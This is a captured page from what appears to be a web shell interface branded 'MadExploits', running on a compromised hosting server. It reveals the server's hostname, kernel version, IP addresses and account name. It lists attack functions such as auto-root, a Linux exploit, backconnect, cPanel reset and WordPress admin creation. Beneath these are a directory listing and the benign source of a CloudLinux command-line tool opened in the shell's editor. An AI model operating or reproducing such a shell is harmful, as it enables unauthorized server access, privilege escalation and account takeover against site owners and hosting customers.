Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.63
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
cloudlinux /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.65
KB
-rw-r--r--
activate.csh
915
B
-rw-r--r--
activate.fish
2.14
KB
-rw-r--r--
alembic
202
B
-rwxr-xr-x
cagefs_enter_site.py
1.83
KB
-rwxr-xr-x
chardetect
210
B
-rwxr-xr-x
cl_sysctl
4.51
KB
-rwxr-xr-x
clcpapi
3.64
KB
-rwxr-xr-x
coverage
204
B
-rwxr-xr-x
coverage-3.11
204
B
-rwxr-xr-x
coverage3
204
B
-rwxr-xr-x
cpanel-dbmapping
3.84
KB
-rwxr-xr-x
crontab-user-wrapper.py
2.46
KB
-rwxr-xr-x
da_suid_caller.py
686
B
-rw-r--r--
detect-requirements
211
B
-rwxr-xr-x
dodgy
197
B
-rwxr-xr-x
epylint
208
B
-rwxr-xr-x
f2py
205
B
-rwxr-xr-x
f2py3
205
B
-rwxr-xr-x
f2py3.11
205
B
-rwxr-xr-x
flake8
203
B
-rwxr-xr-x
futurize
204
B
-rwxr-xr-x
get_gprof
1.84
KB
-rwxr-xr-x
get_objgraph
1.63
KB
-rwxr-xr-x
isort
198
B
-rwxr-xr-x
isort-identify-imports
232
B
-rwxr-xr-x
jsonschema
202
B
-rwxr-xr-x
lvestats_config_reader.py
1.12
KB
-rw-r--r--
mako-render
202
B
-rwxr-xr-x
normalizer
233
B
-rwxr-xr-x
pasteurize
206
B
-rwxr-xr-x
pip
237
B
-rwxr-xr-x
pip3
237
B
-rwxr-xr-x
pip3.11
237
B
-rwxr-xr-x
plesk_suid_caller.py
905
B
-rw-r--r--
prospector
202
B
-rwxr-xr-x
py.test
210
B
-rwxr-xr-x
pycodestyle
201
B
-rwxr-xr-x
pydocstyle
202
B
-rwxr-xr-x
pyflakes
200
B
-rwxr-xr-x
pylint
206
B
-rwxr-xr-x
pylint-config
222
B
-rwxr-xr-x
pyreverse
212
B
-rwxr-xr-x
pysemver
198
B
-rwxr-xr-x
pytest
210
B
-rwxr-xr-x
python
15.01
KB
-rwxr-xr-x
python3
15.01
KB
-rwxr-xr-x
python3.11
15.01
KB
-rwxr-xr-x
raven
208
B
-rwxr-xr-x
symilar
208
B
-rwxr-xr-x
tap
196
B
-rwxr-xr-x
tappy
196
B
-rwxr-xr-x
undill
603
B
-rwxr-xr-x
virtualenv
227
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clcpapi
#!/opt/cloudlinux/venv/bin/python3 -bb # -*- coding: utf-8 -*- # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT """ CloudLinux control panel API command line interface """ import argparse from clcommon import cpapi from clcommon.cloutput import prepare_data_json, prepare_attention_json from clcommon.cpapi import cpapiexceptions def cpapi_parser(): parser = argparse.ArgumentParser(description="%(prog)s - CloudLinux control panel API command line interface") parser.add_argument('-j', '--json', action='store_true', default=False, help='Output in json format') subparsers = parser.add_subparsers(dest='command') docroot_parser = subparsers.add_parser('docroot') docroot_parser.add_argument('domain', help='Return document root for domain') userdomains_parser = subparsers.add_parser('userdomains') userdomains_parser.add_argument('userdomains', help='Return domain and document root pairs for control panel user') dblogin_cplogin_pairs_parser = subparsers.add_parser("dblogin_cplogin_pairs") dblogin_cplogin_pairs_parser.add_argument("--cplogin_lst", nargs="*", help="Return mapping for this system users") dblogin_cplogin_pairs_parser.add_argument("--with_system_users", action="store_true", default=False, help="Show system users in output") reseller_users = subparsers.add_parser("reseller-users", help="Show reseller users") reseller_users.add_argument( 'resellername', type=str, nargs='?', help='Reseller name') return parser def flat_plain(data, sep=' '): return '\n'.join([sep.join(tuple_) for tuple_ in data]) def main(): parser = cpapi_parser() namespace = parser.parse_args() output_ = None exit_code = 0 try: if namespace.command == 'docroot': domain, user = cpapi.docroot(namespace.domain) if namespace.json: output_ = prepare_data_json({'domain': domain, 'user': user}) else: output_ = domain + ' ' + user elif namespace.command == 'userdomains': domain_docroot_pairs = cpapi.userdomains(namespace.userdomains) if namespace.json: data = [{'domain': domain_docroot[0], 'docroot': domain_docroot[1]} for domain_docroot in domain_docroot_pairs] output_ = prepare_data_json(data) else: output_ = flat_plain(domain_docroot_pairs) elif namespace.command == 'dblogin_cplogin_pairs': db_mapping = cpapi.dblogin_cplogin_pairs(namespace.cplogin_lst, namespace.with_system_users) if namespace.json: output_ = prepare_data_json(db_mapping) else: output_ = flat_plain(db_mapping) elif namespace.command == 'reseller-users': users = cpapi.reseller_users(namespace.resellername) if namespace.json: output_ = prepare_data_json(users) else: output_ = '\n'.join(users) except cpapiexceptions.CPAPIException as e_: if namespace.json: output_ = prepare_attention_json(str(e_)) else: exit_code = 1 output_ = 'ERROR: ' + str(e_) return output_, exit_code if __name__ == '__main__': import sys output_, exit_code = main() if output_: print(output_) if exit_code: sys.exit(exit_code)
Close